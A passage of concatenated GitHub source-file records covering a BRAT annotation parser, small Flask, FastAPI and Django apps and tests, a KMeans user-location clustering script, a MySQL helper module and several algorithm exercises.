entity:\n offs_parts = offsets.split()\n\n if len(offs_parts) == 3:\n label, start_off, end_off = offs_parts\n start_off = int(start_off)\n end_off = int(end_off)\n ann_offsets.append((label, start_off, end_off, entity))\n example_added = True\n # end if\n # end if\n # end if\n\n if not example_added:\n print(f'Problem with example @ line [{line_count}] in .ann file [{ann_file}]',\n file=sys.stderr, flush=True)\n # end if\n # end for\n # end with\n\n crt_offset = 0\n eol_offset = 0\n annotations = {}\n\n # For each paragraph line\n for p_line in txt_lines:\n p_line = _crlf_rx.sub('', p_line)\n\n if conf_with_sentence_splitting:\n s_lines = line_sentence_split(abbreviations, p_line)\n else:\n s_lines = [p_line]\n # end if\n\n 
assert ''.join(s_lines) == p_line\n\n if not s_lines:\n if _with_crlf:\n # Skip over \\r and \\n\n eol_offset += 2\n else:\n # Skip over \\n\n eol_offset += 1\n # end if\n\n crt_offset = eol_offset\n # end if\n\n # For each sentence line\n for i, line in enumerate(s_lines):\n eol_offset = crt_offset + len(line)\n\n if i == len(s_lines) - 1:\n if _with_crlf:\n # Skip over \\r and \\n\n eol_offset += 2\n else:\n # Skip over \\n\n eol_offset += 1\n # end if\n # end if\n\n for lbl, soff, eoff, ent in ann_offsets:\n if soff >= crt_offset and eoff <= eol_offset:\n line_soff = soff - crt_offset\n line_eoff = eoff - crt_offset\n \n assert line[line_soff:line_eoff] == ent\n\n if line not in annotations:\n annotations[line] = []\n # end if\n\n annotations[line].append((lbl, line_soff, line_eoff))\n # end if\n # end for\n\n crt_offset = eol_offset\n # end all sentence lines\n # end for\n\n return annotations\n\ndef line_sentence_split(abbreviations: set[str], input_line: str) -> list[str]:\n \"\"\"All returned strings, concatenated, are equal to the input.\n Split only at '.'\"\"\"\n\n current_sentence = []\n sentences = []\n\n for i in range(len(input_line)):\n current_sentence.append(input_line[i])\n\n if input_line[i] == '.':\n # Check to see if the previous token is \n # not an abbreviation.\n p_token = ['.']\n\n for j in range(i - 1, -1, -1):\n if input_line[j] not in ' \\r\\n\\t':\n p_token.insert(0, input_line[j])\n else:\n break\n # end if\n # end for\n\n p_token = ''.join(p_token)\n\n if p_token not in abbreviations and \\\n i < len(input_line) - 1 and \\\n _sentence_case_rx.match(input_line[i + 1:]):\n sentences.append(''.join(current_sentence))\n current_sentence.clear()\n # end if\n # end if\n # end for\n\n if current_sentence:\n sentences.append(''.join(current_sentence))\n # end if\n\n return sentences\n\n\ndef read_txt_ann_folder(ann_folder: str,\n annotations: dict[str, list[tuple[str, int, int]]],\n abbreviations: set[str]) -> None:\n \"\"\"Reads all BRAT annotations from folder and puts them in `annotations`.\"\"\"\n\n for txt in os.listdir(ann_folder):\n if txt.endswith('.txt'):\n ann = os.path.join(ann_folder, Path(txt).stem + '.ann')\n\n if os.path.isfile(ann):\n txt = os.path.join(ann_folder, txt)\n results = read_txt_ann_pair(\n txt_file=txt,\n ann_file=ann, abbreviations=abbreviations)\n\n for line in results:\n if line not in annotations:\n annotations[line] = results[line]\n else:\n for lb1, so1, eo1 in results[line]:\n conflict_found = False\n\n for lb2, so2, eo2 in annotations[line]:\n if ((so2 <= so1 and so1 <= eo2) or \\\n (so2 <= eo1 and eo1 <= eo2)) and \\\n lb1 != lb2:\n print(f'Conflicting annotation in file [{ann}]:', file=sys.stderr, flush=True)\n print(f' -> {lb1} @ {so1} -- {eo1}', file=sys.stderr, flush=True)\n print(f' -> {lb2} @ {so2} -- {eo2}', file=sys.stderr, flush=True)\n conflict_found = True\n break\n # end if\n # end search for conflic\n\n if not conflict_found and \\\n (lb1, so1, eo1) not in annotations[line]:\n annotations[line].append((lb1, so1, eo1))\n # end if\n # end for\n # end if\n # end for all lines in annotations\n # end if\n # end if\n # end for\n\n\ndef produce_ner_labels(annotations: dict[str, list[tuple[str, int, int]]]) -> list[str]:\n existing_labels = set()\n\n for line in annotations:\n existing_labels = existing_labels.union([lbl for lbl, _, _ in annotations[line]])\n # end for\n\n the_labels = ['O']\n\n for lbl in sorted(existing_labels):\n the_labels.append(f'B-{lbl}')\n the_labels.append(f'I-{lbl}')\n # end for\n\n return 
the_labels\n","repo_name":"racai-ai/saroj","sub_path":"WebServiceModules/BERTAnnotator/brat.py","file_name":"brat.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"18290940495","text":"from flask import Flask\nfrom flask_restx import Api, Resource\n\napp = Flask(__name__)\napi = Api(app) \n\n@api.route('/getmealAmount') \nclass MealAmount(Resource):\n def get(self): \n return {\n \"amount\": 100\n }\n\nif __name__ == '__main__':\n app.run(debug=False, host='0.0.0.0', port=3000)","repo_name":"JaeHyun154/Cabstone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"37724498583","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport random\n# Create your views here.\n\ndef cookieSet(request):\n visits = request.session.get('visits', 0) + 1\n request.session['visits'] = visits\n resp = HttpResponse('<h1>Eat this cookie :)</h1><p>view count='+str(visits)+' times</p>' +'<p>69b7411e</p>')\n resp.set_cookie('Anor_Londo', random.randint(10000,9999999999))\n resp.set_cookie('dj4e_cookie', '69b7411e', max_age=1000)\n return resp\n","repo_name":"iiDeSTRoYeR/mysiteProject","sub_path":"mysite/hello/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"1641177356","text":"from model.project import Project\nimport random\n\n\ndef test_del_project(app):\n if len(app.project.get_project_list()) == 0:\n app.project.create_project(Project(name=\"test\"))\n app.project.confirm()\n old_projects = app.project.get_project_list()\n old_soap_projects = app.soap.get_projects()\n project = random.choice(old_projects)\n app.project.delete_project(project.name)\n new_projects = app.project.get_project_list()\n new_soap_projects = app.soap.get_projects()\n old_soap_projects.remove(project)\n old_projects.remove(project)\n assert sorted(old_projects, key=lambda p: p.name) == sorted(new_projects, key=lambda p: p.name)\n assert sorted(old_soap_projects, key=lambda p: p.name) == sorted(new_soap_projects, key=lambda p: p.name)\n\n\n","repo_name":"alexpodoff/python_training_mantis","sub_path":"test/test_del_project.py","file_name":"test_del_project.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"20677608028","text":"choose=input(\"Original [press 0] or New [press 1]?\")\r\nif(choose==\"1\"):\r\n filename1 = input(\"first file: \") \r\n filename2 = input(\"second file: \") \r\nelse:\r\n filename1 = \"Naruto-out-6-dfs\"\r\n filename2 = \"my_out.txt\"\r\n\r\nfile1 = open(filename1).readlines() \r\n \r\nfile1_line = []\r\n \r\n#for lines in file1:\r\n#file1_line.append(lines)\r\nfile1_line=file1[0].split(\",\")\r\nfile2 = open(filename2).readlines() \r\n \r\nfile2_line = []\r\nfile2_line=file2[0].split(\",\")\r\n#for lines in file2:\r\n#file2_line.append(lines)\r\n \r\nn = 0 \r\nif len(file1) > len(file2): \r\n print(\"Length Of File is \",filename1,\"is greater than\",filename2,len(file1),\">\",len(file2)) \r\n for line in file1_line: \r\n if line != file2_line[n]: \r\n print(\"Not Match:\",\"Word :\",n + 1,filename1,\":\",line,\"|\",filename2,\":\",file2_line[n])\r\n n += 1 \r\n else: \r\n n += 1 \r\n \r\n \r\nelif len(file1) < len(file2): \r\n n = 0 \r\n print(\"Length Of File is \",filename1,\"is less than\",filename2,len(file1),\"<\",len(file2)) \r\n for line in file2_line: \r\n if line != file1_line[n]: \r\n print(\"Not Match:\",\"Line :\",n + 1,filename2,\":\",line,\"|\",filename1,\":\",file1_line[n]) \r\n n += 1 \r\n else: \r\n n += 1 \r\n \r\n \r\nelse: \r\n print(\"Length Of File is \",filename1,\"Equals\",filename2,len(file1),\"==\",len(file2))\r\n flag = True;\r\n n = 0 \r\n for line in file1_line: \r\n if line != file2_line[n]: \r\n print(\"Not Match: \",\"Line :\",n + 1,filename1,\":\",line,\"|\",filename2,\":\",file2_line[n])\r\n flag = False;\r\n n += 1 \r\n else: \r\n n += 1\r\n\r\n if(flag):\r\n print(\"Complete Match\")\r\n else:\r\n print(\"File doesn't match on the above lines\")\r\n","repo_name":"tensor-shock/Data-Structres_and_Algorithms","sub_path":"A4/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
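A compact, standard-library alternative to the manual word-by-word comparison above, using the script's own default file names:

```python
# Sketch: diff the first line's comma-separated words with difflib.
import difflib

with open("Naruto-out-6-dfs") as f1, open("my_out.txt") as f2:
    words1 = f1.readline().split(",")
    words2 = f2.readline().split(",")

# unified_diff only reports the words that differ, with -/+ markers
for line in difflib.unified_diff(words1, words2,
                                 fromfile="Naruto-out-6-dfs",
                                 tofile="my_out.txt", lineterm=""):
    print(line)
```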
{"seq_id":"7931075230","text":"from django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom apiCandidat import views\n\nurlpatterns = [\n path('candidats/', views.CandidatList.as_view()),\n path('candidats/<int:pk>/', views.CandidatDetail.as_view()),\n path('recruteurs/', views.RecruteurList.as_view()),\n path('recruteurs/<int:pk>/', views.RecruteurDetail.as_view()),\n path('partenaires/', views.PartenaireList.as_view()),\n path('partenaires/<int:pk>/', views.PartenaireDetail.as_view()),\n path('clients/', views.CandidatList.as_view()),\n path('clients/<int:pk>/', views.CandidatDetail.as_view()),\n path('offres/', views.OffreList.as_view()),\n path('offres/<int:pk>/', views.OffreDetail.as_view()),\n path('meetings/', views.MeetingList.as_view()),\n path('meetings/<int:pk>/', views.MeetingDetail.as_view()),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","repo_name":"mustaphaezzali/Architeo-chatbot-api","sub_path":"backend/archibotpro/apiCandidat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"37742879352","text":"import requests, sys\n\n#Hsa = human KEGG_ID\n#\nserver = \"http://rest.kegg.jp/link/pathway/hsa:\"\n\n#human genes linked from each of the KEGG pathways\n#link/pathway/hsa:10458+ece:Z5100\n# KEGG pathways linked from a human gene and an E. coli O157 gene\n\n#Experimental KgID ENST00000000233.10\n\n# Queries the KEGG REST API for the pathways linked to a human gene\ndef get_KEGG_pathway(gene_id):\n name = \"name not found\"\n if True: # set to False to skip downloading fresh data\n try:\n r = requests.get(server+gene_id)\n print(r.text)\n if not r.ok:\n r.raise_for_status()\n sys.exit()\n\n #new_name = decoded.get(\"display_name\")\n #name = new_name if new_name else decoded.get(\"description\")\n #if name:\n # name = name.replace(\",\",\"_\")\n # name = name.replace(\" \", \"_\")\n #name = new_name if new_name else name\n #return name\n except requests.exceptions.HTTPError:\n print(\"not found\")\n #name = \"name not found\"\n #return name\n else:\n return name\n\nget_KEGG_pathway(\"160287\")\n","repo_name":"AndreasAAR/HNSCC_project","sub_path":"Scripts/Deprecated/Get_KEGG_API_pathways.py","file_name":"Get_KEGG_API_pathways.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"3446651551","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def inorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n ans=[]\n def inordert(rootnode):\n if not rootnode:\n return \n inordert(rootnode.left)\n ans.append(rootnode.val)\n inordert(rootnode.right)\n inordert(root)\n return ans\n \n ","repo_name":"kibrnew/computative-kb","sub_path":"0094-binary-tree-inorder-traversal/0094-binary-tree-inorder-traversal.py","file_name":"0094-binary-tree-inorder-traversal.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
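An iterative version of the same traversal, for comparison: an explicit stack replaces the call stack of the recursive helper above:

```python
# Sketch: iterative inorder traversal with an explicit stack.
def inorder_iterative(root):
    ans, stack, node = [], [], root
    while node or stack:
        while node:            # walk left, stacking ancestors
            stack.append(node)
            node = node.left
        node = stack.pop()
        ans.append(node.val)   # visit the node
        node = node.right      # then handle the right subtree
    return ans
```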
{"seq_id":"37566899547","text":"import sys\nsys.setrecursionlimit(200000)\n\ninput = sys.stdin.readline\n\ndef inp():\n return (int(input()))\ndef inlt():\n return (list(map(int, input().split())))\ndef insr():\n s = input()\n return (list(s[:len(s) - 1]))\ndef invr():\n return (map(int, input().split()))\n\n\ndef solution():\n n = inp()\n tree = [[] for _ in range(n+1)]\n for i in range(n-1):\n a, b = inlt()\n tree[a].append(b)\n tree[b].append(a)\n q = inp()\n queries = []\n for i in range(q):\n queries.append(inlt())\n\n leaves = [0] * (n + 1)\n\n stack = []\n for node in tree[1]:\n stack.append((node, 1))\n seen = set()\n seen.add(1)\n\n while len(stack) > 0:\n top_node, pre = stack[-1]\n if len(tree[top_node]) == 1:\n leaves[top_node] += 1\n leaves[pre] += leaves[top_node]\n stack.pop()\n elif top_node not in seen:\n seen.add(top_node)\n for node in tree[top_node]:\n if node not in seen:\n stack.append((node, top_node))\n elif top_node in seen:\n leaves[pre] += leaves[top_node]\n stack.pop()\n\n for x, y in queries:\n print(leaves[x] * leaves[y])\n\n\nif __name__ == '__main__':\n t = inp()\n for i in range(t):\n solution()\n","repo_name":"cybsbbb/codeforces_practice","sub_path":"contests/Round881/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"33064732631","text":"import os\r\nfrom flask import Flask, render_template, redirect, url_for ,request, flash, json\r\nfrom DbClass import DbClass\r\nfrom DbClass import get_last_temp, get_last_pressure, get_last_humidity,get_last_uvindex,get_last_light,get_last_rain,get_last_windspeed, time_format\r\nfrom DbClass import history_temperature_format, history_airpressure_format, history_humidity_format, history_uv_index_format, history_light_index_format, history_rainfall_format, history_windspeed_format\r\n\r\napp = Flask(__name__)\r\nmysql = DbClass()\r\n\r\n@app.route(\"/\")\r\ndef base():\r\n weather_list = get_db_data()\r\n title = \"Temperature\"\r\n return render_template(\"base.html\", weather_data = weather_list, history_val=history_temperature_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation\")\r\ndef base2():\r\n weather_list = get_db_data()\r\n title = \"Temperature\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_temperature_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/temperature\")\r\ndef temperature():\r\n weather_list = get_db_data()\r\n title = \"Temperature\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_temperature_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/airpressure\")\r\ndef airpressure():\r\n weather_list = get_db_data()\r\n title = \"Airpressure\"\r\n return render_template(\"base.html\", weather_data = weather_list, history_val=history_airpressure_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/humidity\")\r\ndef humidity():\r\n weather_list = get_db_data()\r\n title = \"Humidity\"\r\n return render_template(\"base.html\", weather_data = weather_list, history_val=history_humidity_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/uvindex\")\r\ndef uvindex():\r\n weather_list = get_db_data()\r\n title = \"UV-index\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_uv_index_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/lightindex\")\r\ndef lightindex():\r\n weather_list = get_db_data()\r\n title = \"Light-index\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_light_index_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/rainfall\")\r\ndef rainfall():\r\n weather_list = 
get_db_data()\r\n title = \"Rainfall [1 = low / 2 = light rain / 3 = heavy rain]\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_rainfall_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\n@app.route(\"/weatherstation/windspeed\")\r\ndef windspeed():\r\n weather_list = get_db_data()\r\n title = \"Windspeed\"\r\n return render_template(\"base.html\", weather_data=weather_list, history_val=history_windspeed_format(),\r\n history_time=time_format(),\r\n title=title)\r\n\r\ndef get_db_data():\r\n data = []\r\n data.append(get_last_temp())\r\n data.append(get_last_pressure())\r\n data.append(get_last_humidity())\r\n data.append(get_last_uvindex())\r\n data.append(get_last_light())\r\n data.append(get_last_rain())\r\n data.append(get_last_windspeed())\r\n return data\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True, host='0.0.0.0')","repo_name":"orinocoz/Project1WD","sub_path":"Project Git/weatherstation_flask.py","file_name":"weatherstation_flask.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
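The weather-station record above repeats a near-identical handler per measurement. A sketch of how those handlers could collapse into a single parameterized Flask route — the `METRICS` table and its entries are hypothetical, but every function referenced exists in the record:

```python
# Sketch: one parameterized route instead of one handler per metric.
METRICS = {
    "temperature": (history_temperature_format, "Temperature"),
    "humidity": (history_humidity_format, "Humidity"),
    "windspeed": (history_windspeed_format, "Windspeed"),
    # ... one entry per measurement
}

@app.route("/weatherstation/<metric>")
def show_metric(metric):
    formatter, title = METRICS[metric]
    return render_template("base.html", weather_data=get_db_data(),
                           history_val=formatter(),
                           history_time=time_format(), title=title)
```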
time, city = heapq.heappop(queue)\n if city in visited:\n continue\n visited.add(city)\n city_count += 1\n time_count = max(time_count, time)\n for next_city, additional_costs in connection[city]:\n heapq.heappush(queue, (time+additional_costs, next_city))\nprint(city_count, time_count)","repo_name":"yuna1212/algorithm","sub_path":"이것이 취업을 위한 코딩 테스트다/최단 경로/전보.py","file_name":"전보.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"28351726110","text":"#!/usr/bin/python\n# Author : Wolf Rendall, 2014\n# wrendall@auction.com\n# Auction.com \n\n# This script contains the clustering implementation that takes all the geocoded user actions and returns their primary area of search\n# This is meant to run after beck_user_data.pig and before beck_asset_sort.pig\n\n# Currently we cluster using:\n# Registration ZIP\n# State Notifications\n# Alerts ZIP\n# Bids\n# Saved Searches\n# PDP Views\n# Vault Views\n# We hope to add all searches ASAP\n\nimport sys\nimport numpy as np\n#import datetime # We use this for efficiency testing only\nfrom sklearn.cluster import KMeans\n\n# Define an error checking function. This will handle missing or weird lat/lons\ndef checkfloat (value):\n try:\n float(value)\n return float(value)\n except ValueError:\n return \"Missing Lat/Lon Value: %s\" %(value)\ndef checkint (value):\n try:\n int(float(value))\n return int(float(value))\n except ValueError:\n return \"Missing Weight Value: %s\" %(value)\n\n#t0 = datetime.datetime.utcnow()\n# input comes from STDIN (standard input)\nfor line in sys.stdin:\n try:\n # remove any leading and trailing whitespace\n line = line.strip()\n # split the line into the email address and the remainder part containing variable number of tuples\n user_id, raw_tuples = line.split(',',1)\n # the whole set of tuples is wrapped in curly braces so strip them off first\n raw_tuples = raw_tuples.strip('({})')\n tuples = raw_tuples.split('),')\n # process each tuple into an array of coords\n obs = []\n for tup in tuples:\n user_id, action, lat, lon, wgt = tup.strip('()').split(',',4)\n lat = checkfloat(lat)\n lon = checkfloat(lon)\n wgt = checkint(wgt)\n if type(lat) is float and type(lon) is float and type(wgt) is int:\n row = [lat, lon]\n for i in range(wgt):\n obs.append(row)\n #else: print >> sys.stderr, (user_id,lat,lon)\n\n #Make that array into a numpy array of two columns\n user_actions = np.array(obs)\n #print '%s \\t %s \\n %s' %(user_id, np.size(user_actions), user_actions)\n #Make sure we even need to cluster by requiring 2 or more lat/lon coords\n if np.size(user_actions) > 3:\n number_of_clusters = int(np.floor(min(max(np.sqrt(np.size(user_actions) *0.5),2), 5)))\n #print \" KMeans with %s clusters\" % (number_of_clusters)\n #Important note, it is possible to employ parallelization with the n_jobs arg\n kmeans = KMeans(init='k-means++', n_clusters=number_of_clusters, n_init=10, tol = 0.00001, verbose = 0, n_jobs = 1)\n results = kmeans.fit(user_actions)\n group_labels = results.labels_\n centroids = results.cluster_centers_\n unique_labels = np.unique(group_labels)\n\n #print(group_labels)\n #print(centroids)\n\n ##Get the Einstein Sum of all points in the centroids\n #distances = []\n #for centroid in centroids:\n #coded_actions = np.array(zip(user_actions, labels))\n within_centroid_distances = []\n centroid_size = []\n for label in unique_labels:\n distances = []\n my_centroid = centroids[label]\n members = 
user_actions[group_labels==label]\n member_count = np.size(members)/2\n centroid_size.append(member_count)\n for member in members:\n distance = np.sqrt(np.square(member[0]-my_centroid[0])+np.square(member[1]-my_centroid[1]))\n distances.append(distance)\n #print('my_centroid:\\t%s\\n member: \\t%s\\n distance:\\t%s') %(my_centroid, member, distance)\n within_centroid_distances.append(np.mean(distances))\n \n #print(within_centroid_distances)\n smallest_cluster_index = np.argmin(centroid_size)\n largest_cluster_index = np.argmax(centroid_size)\n\n #Remove the smallest cluster from consideration\n if len(within_centroid_distances) > 11:\n smallest_cluster_index = np.argmin(centroid_size)\n smallest_cluster_value = centroids[smallest_cluster_index]\n smallest_cluster_distance = within_centroid_distances[smallest_cluster_index]\n centroids = [x for x in centroids if (x[0]+x[1]) != (smallest_cluster_value[0]+smallest_cluster_value[1])]\n within_centroid_distances = [x for x in within_centroid_distances if x != smallest_cluster_distance]\n\n #Find the best cluster of the remaining clusters:\n best_cluster_index = np.argmin(within_centroid_distances)\n final_center = centroids[best_cluster_index]\n\n final_center_size = centroid_size[best_cluster_index]\n largest_cluster_index = np.argmax(centroid_size)\n largest_center_size = centroid_size[largest_cluster_index]\n largest_center = centroids[largest_cluster_index]\n\n #print ('User: %s \\nCentroid: %s \\nBased on %s geocodable actions') % (user_id, final_center, np.size(user_actions)/2)\n #note, the sorting pig script is expecting a file named beck_centroids.tsv\n if largest_center_size < 200:\n print ('%s\\t%s\\t%s') % (user_id, final_center[0], final_center[1])\n else: \n print ('%s\\t%s\\t%s') % (user_id, largest_center[0], largest_center[1])\n #If not enough lat/lon coords, just print the registration geocode\n elif 'row' in locals(): print ('%s\\t%s\\t%s') % (user_id, row[0], row[1])\n #else: print ('User: %s \\nCentroid: %s \\nBased on %s geocodable actions') % (user_id,'Insufficient Data', np.size(user_actions)/2)\n #print 'finished in %s' % (datetime.datetime.utcnow() - t0)\n except ValueError:\n print >> sys.stderr, line\n","repo_name":"kwisatzhaderak/Python","sub_path":"KMEANS_Example.py","file_name":"KMEANS_Example.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35089667617","text":"from fastapi import FastAPI, File\nfrom starlette.responses import Response\n\nfrom classification import get_model\n\nimport io\nfrom PIL import Image\nimport os\n###\nfrom model import DetectorModel\n\nmodel = get_model(\"./inference_models/mobilenet_v2_checkpoint_202101281638.hdf5\")\nmodel_detector_path = \"./inference_models/yolov5s_tomato_3classes.pt\"\n\napp = FastAPI(\n title=\"Plant Disease Detector\",\n description=\"Plant Disease Detector using DL Models\",\n version=\"0.1.0\",\n)\n\n@app.post(\"/classification\")\ndef get_predict_disease_result(file: bytes = File(...)):\n \"\"\"\"\"\"\n image = Image.open(io.BytesIO(file)).convert(\"RGB\")\n pred = model.prediction(image_data=image)\n\n return Response(content=pred, status_code=200)\n\n@app.post(\"/detector\")\ndef get_predict_disease_result_detector(file: bytes = File(...)):\n \"\"\"\"\"\"\n test_img_path = './test_images/'\n result_img_path = './detect_results/'\n test_file = 'test_img.png'\n name_path = 'tomato/'\n\n image = Image.open(io.BytesIO(file)).convert(\"RGB\")\n 
image.save(test_img_path+test_file)\n\n model_detector = DetectorModel(\n weights=model_detector_path,\n source=test_img_path,\n img_size=416,\n conf_thres=0.5, iou_thres=0.45, device='cpu', view_img=False, save_txt=False,\n save_conf=False, classes=None, agnostic_nms=False, augment=False, update=False,\n project = result_img_path, name=name_path, exist_ok=True\n )\n model_detector.detect()\n\n return Response(content='../backend/' + result_img_path + name_path + test_file, status_code=200)\n","repo_name":"IVADL/PDD-prototype_local","sub_path":"backend/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20509388973","text":"import MySQLdb\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nconn= MySQLdb.connect(host='localhost',user='root',passwd='chenanzhe',db='web',port=3306,charset='utf8')\ndef insertDB(tableName = None, listOfColumns = [], listOfValues = [], sql = None):\n\tif sql != None:\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tconn.commit()\n\t\tcur.close()\n\telse:\n\t\tassert len(listOfColumns) == len(listOfValues)\n\t\tcolumns = \",\".join(listOfColumns)\n\t\tvalues = \"'\"\n\t\tvalues += \"','\".join(listOfValues)\n\t\tvalues += \"'\"\n\t\tsql = \"\"\"insert into {0}({1}) values({2})\"\"\".format(tableName,columns,values)\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tconn.commit()\n\t\tcur.close()\n\ndef searchDB(tableName=None, columns = [], where = None,sql =None):\n\tif sql != None:\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tresults = cur.fetchall()\n\telse:\n\t\tif where == None and columns == None:\n\t\t\tsql = \"select * from {0}\".format(tableName)\n\t\telif where == None and columns != []:\n\t\t\tcolumns = \",\".join(columns)\n\t\t\tsql = \"select {0} from {1}\".format(columns, tableName)\n\t\telif where != None and columns == []:\n\t\t\tsql = \"select * from {0} where {1}\".format(tableName, where)\n\t\telse:\n\t\t\tcolumns = \",\".join(columns)\n\t\t\tsql = \"select {0} from {1} where {2}\".format(columns, tableName, where)\n\t\tcur = conn.cursor()\n\t\tcur.execute(sql)\n\t\tresults = cur.fetchall()\n\treturn results\n\ndef deleteDB(tableName,where = None):\n\tif where == None :\n\t\tsql = \"delete from {0}\".format(tableName)\n\telse:\n\t\tsql = \"delete from {0} where {1}\".format(tableName, where)\n\tcur = conn.cursor()\n\tcur.execute(sql)\n\tconn.commit()\n\tcur.close()","repo_name":"Fantastiser/shopweb","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6160043958","text":"\"\"\" Test for views\"\"\"\nfrom django.contrib.auth.models import User\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom product.models import Category, Product\n\n\nclass TestViews(TestCase):\n \"\"\"\n test all views for product App\n \"\"\"\n\n def setUp(self):\n self.user_bob = User.objects.create_user(\n username=\"bob\", first_name=\"bob\", password=\"toto2021\"\n )\n self.user_bob.save()\n self.user_roger = User.objects.create_user(\"roger\")\n self.user_roger.save()\n\n add_category_1 = Category.objects.create(name=\"Pizza\")\n add_category_2 = Category.objects.create(name=\"Fromage\")\n add_category_3 = Category.objects.create(name=\"Test\")\n add_category_4 = Category.objects.create(name=\"Test_2\")\n\n self.add_product_1 = Product.objects.create(\n 
name=\"Pizza test\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=None,\n nutriscore=\"D\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n self.add_product_1.save()\n self.add_product_1.category.add(add_category_1, add_category_3)\n\n add_product_2 = Product.objects.create(\n name=\"Pizza fromage\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=\"https://masuperpizza.fr\",\n nutriscore=\"C\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n\n add_product_2.category.add(add_category_1, add_category_2, add_category_3)\n\n add_product_3 = Product.objects.create(\n name=\"Pizza fromage meilleur\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=\"https://masuperpizza.fr\",\n nutriscore=\"A\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n\n add_product_3.category.add(add_category_1, add_category_2, add_category_4)\n\n add_product_4 = Product.objects.create(\n name=\"Pizza 5 fromage\",\n image_product=\"https://image.fr\",\n stores=\"OpenClassrooms\",\n url=\"https://masuperpizza.fr\",\n nutriscore=\"A\",\n image_nutrient_benchmarks=\"https://image_repere.fr\",\n )\n add_product_4.category.add(add_category_1, add_category_2, add_category_4)\n\n def test_index(self):\n \"\"\"\n Test index url\n - status_code (200, 301)\n - if login display if not user authentificated\n - if logout display if user authentificated\n \"\"\"\n response = self.client.get(\"\")\n self.assertEqual(response.status_code, 200)\n response = self.client.get(\"/index\")\n self.assertEqual(response.status_code, 301)\n\n # Test display login / logout if user is authentificated\n\n self.client.force_login(User.objects.get_or_create(username=\"testuser\")[0])\n response = self.client.get(\"\")\n icon_log_out = \"fa-sign-out-alt\"\n icon_log_in = \"fa-sign-in-alt\"\n self.assertIn(icon_log_out, response.content.decode(\"utf-8\"))\n self.assertNotIn(icon_log_in, response.content.decode(\"utf-8\"))\n\n self.client.logout()\n response = self.client.get(\"\")\n\n self.assertIn(icon_log_in, response.content.decode(\"utf-8\"))\n self.assertNotIn(icon_log_out, response.content.decode(\"utf-8\"))\n\n def test_legal(self):\n \"\"\"\n Test legal mention url (/legal/)\n - status_code (200, 301)\n \"\"\"\n response = self.client.get(\"/legal/\")\n self.assertEqual(response.status_code, 200)\n\n response = self.client.post(\"/legal/\")\n 